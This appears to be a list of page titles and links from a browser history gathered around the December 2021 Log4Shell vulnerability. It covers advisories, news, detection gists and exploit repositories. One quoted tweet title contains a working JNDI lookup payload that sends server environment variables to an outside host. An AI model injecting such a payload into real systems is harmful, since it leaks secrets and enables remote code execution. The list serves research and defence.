Log4Shell: RCE 0-day exploit found in log4j, a popular Java logging package | LunaTrace
https://www.lunasec.io/docs/blog/log4j-zero-day/
GitHub - YfryTchsGD/Log4jAttackSurface
https://github.com/YfryTchsGD/Log4jAttackSurface
GreyNoise on Twitter: "GreyNoise is detecting a sharply increasing number of hosts opportunistically exploiting Apache Log4J CVE-2021-44228. Exploitation occurring from ~100 distinct hosts, almost all of which are Tor exit nodes. Tags available to all users and customers now. https://t.co/JF3tUkpIrq https://t.co/CTMi0IWQ5j" / Twitter
https://twitter.com/GreyNoiseIO/status/1469326260803416073
CVE-2021-44228 Apache Log4j RCE Attempts Dec 20th 9:27PM ET · GitHub
https://gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217
GitHub - tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce: Apache Log4j Remote Code Execution
https://github.com/tangxiaofeng7/apache-log4j-poc
Log4j RCE CVE-2021-44228 Exploitation Detection · GitHub
https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
eXploit – CVE-2021-42287/CVE-2021-42278 Weaponisation
https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html
us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf
Exploiting JNDI Injections in Java | Veracode blog
https://www.veracode.com/blog/research/exploiting-jndi-injections-java
Zero-day in ubiquitous Log4j tool poses a grave threat to the Internet | Ars Technica
https://arstechnica.com/information-technology/2021/12/minecraft-and-other-apps-face-serious-threat-from-new-code-execution-bug/
Tweet / Twitter
https://twitter.com/GossiTheDog/status/1469121209111658498
Canarytokens
https://canarytokens.org
Query Results | GreyNoise Visualizer
https://www.greynoise.io/viz/query/?gnql=tags%3A%22Apache%20Log4j%20RCE%20Attempt%22
Log4j zero-day gets security fix just as scans for vulnerable systems ramp up
https://therecord.media/log4j-zero-day-gets-security-fix-just-as-scans-for-vulnerable-systems-ramp-up/
The Cyber Startup Observatory - The Global Cyber Innovation Network
https://cyberstartupobservatory.com
GreyNoise on Twitter: "Count of hosts exploiting CVE-2021-44228 has increased from 100 to 150 in several hours. Please find gists w/ IPs exploiting this vulnerability at scale + C2 callback domains. C2/callback domains -https://t.co/6BJ4rb8QX3 IPs exploiting the vuln at scale -https://t.co/NxcIwzWs6J https://t.co/slhUu9VPDT" / Twitter
https://twitter.com/GreyNoiseIO/status/1469376214079053833
CIRCL on Twitter: "TR-65 - Vulnerabilities and Exploitation of Log4j (Remote code injection in Log4j) https://t.co/YqFmTTFQFK We will regularly update the TR with additional information. CVE-2021-44228 https://t.co/4GNcI1CmdA" / Twitter
https://twitter.com/circl_lu/status/1469261434446036997
Canarytokens
https://canarytokens.org/generate#
active-scan-plus-plus/activeScan++.py at master · PortSwigger/active-scan-plus-plus · GitHub
https://github.com/PortSwigger/active-scan-plus-plus/blob/master/activeScan++.py
us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE-wp.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE-wp.pdf
GitHub - veracode-research/rogue-jndi: A malicious LDAP server for JNDI injection attacks
https://github.com/veracode-research/rogue-jndi
Tanner Barnes on Twitter: "In case anyone hasn't discovered this. The Log4J formatting is nestable which means payloads like ${jndi:ldap://${env:user}.xyz.collab.com/a} Will leak server side env vars!" / Twitter
https://twitter.com/_StaticFlow_/status/1469358229767475205
Restrict LDAP access via JNDI by rgoers · Pull Request #608 · apache/logging-log4j2 · GitHub
https://github.com/apache/logging-log4j2/pull/608
Log4j – Apache Log4j Security Vulnerabilities
https://logging.apache.org/log4j/2.x/security.html
GitHub - mubix/CVE-2021-44228-Log4Shell-Hashes: Hashes for vulnerable LOG4J versions
https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes
Remote code injection in Log4j · CVE-2021-44228 · GitHub Advisory Database · GitHub
https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
PentesterLab: Learn Web App Pentesting!
https://pentesterlab.com/exercises/log4j_rce/course
1.6 Million WordPress Sites Under Cyberattack From Over 16,000 IP Addresses
https://thehackernews.com/2021/12/16-million-wordpress-sites-under.html
Andrew Morris on Twitter: "Fuck money. We're gonna start posting IOCs/raw data for hosts exploiting Apache Log4J CVE-2021-44228 as often as we can to get the info to as many people as possible. Gists/pastes to follow from the GN twitter account." / Twitter
https://twitter.com/Andrew___Morris/status/1469334257529204740
GitHub - wyunan/Log4j-rce: Log4j-rce
https://github.com/Al0sc/Log4j-rce
Space / Twitter
https://twitter.com/i/spaces/1MnGnkbOXYoJO
GitHub - welk1n/JNDI-Injection-Exploit: JNDI injection testing tool (a tool which generates JNDI links and can start several servers to exploit JNDI injection vulnerabilities, like Jackson, Fastjson, etc.)
https://github.com/welk1n/JNDI-Injection-Exploit
conti-cyber-attack-on-the-hse-full-report.pdf
https://www.hse.ie/eng/services/publications/conti-cyber-attack-on-the-hse-full-report.pdf
Proofpoint Emerging Threats Rules
https://rules.emergingthreatspro.com/open/
New zero-day exploit for Log4j Java library is an enterprise nightmare
https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/
Log4Shell: New 0-day and RCE Exploit in Apache Log4j (CVE-2021-44228) | CronUp Ciberseguridad
https://www.cronup.com/log4shell-nuevo-0-day-y-exploit-rce-en-apache-log4j-cve-2021-44228/
BlackCat: A New Rust-based Ransomware Malware Spotted in the Wild
https://thehackernews.com/2021/12/blackcat-new-rust-based-ransomware.html
GitHub - nice0e3/log4j_POC
https://github.com/nice0e3/log4j_POC
Python script to detect if an HTTP server is potentially vulnerable to the log4j 0day RCE (https://www.lunasec.io/docs/blog/log4j-zero-day/) · GitHub
https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6
Python setter for property sAMAccountName for CVE-2021-42287/CVE-2021-42278 · GitHub
https://gist.github.com/snovvcrash/3bf1a771ea6b376d374facffa9e43383
Russia Blocks Tor Privacy Service in Latest Censorship Move
https://thehackernews.com/2021/12/russia-blocks-tor-privacy-service-in.html
Massive attack against 1.6 million WordPress sites underway
https://www.bleepingcomputer.com/news/security/massive-attack-against-16-million-wordpress-sites-underway/
Deutsche Telekom CERT on Twitter: "🚨⚠️New #0-day vulnerability tracked under "Log4Shell" and CVE-2021-44228 discovered in Apache Log4j 🌶️‼️ We are observing attacks in our honeypot infrastructure coming from the TOR network. Find Mitigation instructions here: https://t.co/tUKJSn8RPF https://t.co/WkAn911rZX" / Twitter
https://twitter.com/DTCERT/status/1469258597930614787?s=20
Enterprise Attack Initial Access w/ Steve Borosh - Antisyphon
https://www.antisyphontraining.com/enterprise-attack-initial-access-w-steve-borosh/#course-scheduleY
Tweet / Twitter
https://twitter.com/GossiTheDog/status/1469248250670727169
A Simple Exploit is Exposing the Biggest Apps on the Internet
https://www.vice.com/en/article/93bag7/a-simple-exploit-is-exposing-the-biggest-apps-on-the-internet
Tweet / Twitter
https://twitter.com/P0rZ9/status/1468949890571337731
Release log4j-2.15.0-rc1 · apache/logging-log4j2 · GitHub
https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1
Technical Advisory – SonicWall SMA 100 Series – Heap-Based Buffer Overflow (CVE-2021-20043) | NCC Group Research Blog | Making the world safer and more secure
https://research.nccgroup.com/2021/12/09/technical-advisory-sonicwall-sma-100-series-heap-based-buffer-overflow-cve-2021-20043/
2021 Internet Hall of Fame Induction Ceremony on Livestream
https://livestream.com/internetsociety/ihof2021
sAMAccountName spoofing - The Hacker Recipes
https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing
A Cognitive Skills Assessment of Digital Forensic Analysts – My Doctoral Dissertation | Chris Sanders
https://chrissanders.org/2021/12/dissertation/
abuse.ch on Twitter: "#TrickBot (rob142) and #Emotet (epoch5) using the same malware distribution server 🕵️👀 mshta -> html -> PowerShell -> DLL 🔥 👉 https://t.co/aNpv2i9oKP TrickBot XLSM (rob142): 📄 https://t.co/a3b0gcfjPc Emotet XLSM (epoch5): 📄 https://t.co/sFcjCdU3xi https://t.co/UG8fJHkazg" / Twitter
https://twitter.com/abuse_ch/status/1468985961669443584
Charlie Clark on Twitter: "So with some help from @_EthicalChaos_ I found a way to weaponise CVE-2021-42287/CVE-2021-42278 and more help from @4ndr3w6S we put some detections together: https://t.co/FwQuI2DiPQ" / Twitter
https://twitter.com/exploitph/status/1469157138928914432
SANS Holiday Hack Challenge & KringleCon 2022 | SANS Institute
http://sans.org/holidayhack
Cas van Cooten on Twitter: "A story in three parts 😶 #log4j https://t.co/XMl02BcaJY" / Twitter
https://twitter.com/chvancooten/status/1469340927923826691?s=20
SANS Holiday Hack Challenge & KringleCon 2022 | SANS Institute
https://sans.org/u/1jm7
Technical Advisory – SonicWall SMA 100 Series – Unauthenticated File Upload Path Traversal (CVE-2021-20040) | NCC Group Research Blog | Making the world safer and more secure
https://research.nccgroup.com/2021/12/09/technical-advisory-sonicwall-sma-100-series-unauthenticated-file-upload-path-traversal-cve-2021-20040/
Log4j RCE 0-day actively exploited | CERT NZ
https://www.cert.govt.nz/it-specialists/advisories/log4j-rce-0-day-actively-exploited/
Worst Apache Log4j RCE Zero day Dropped on Internet - Cyber Kendra
https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html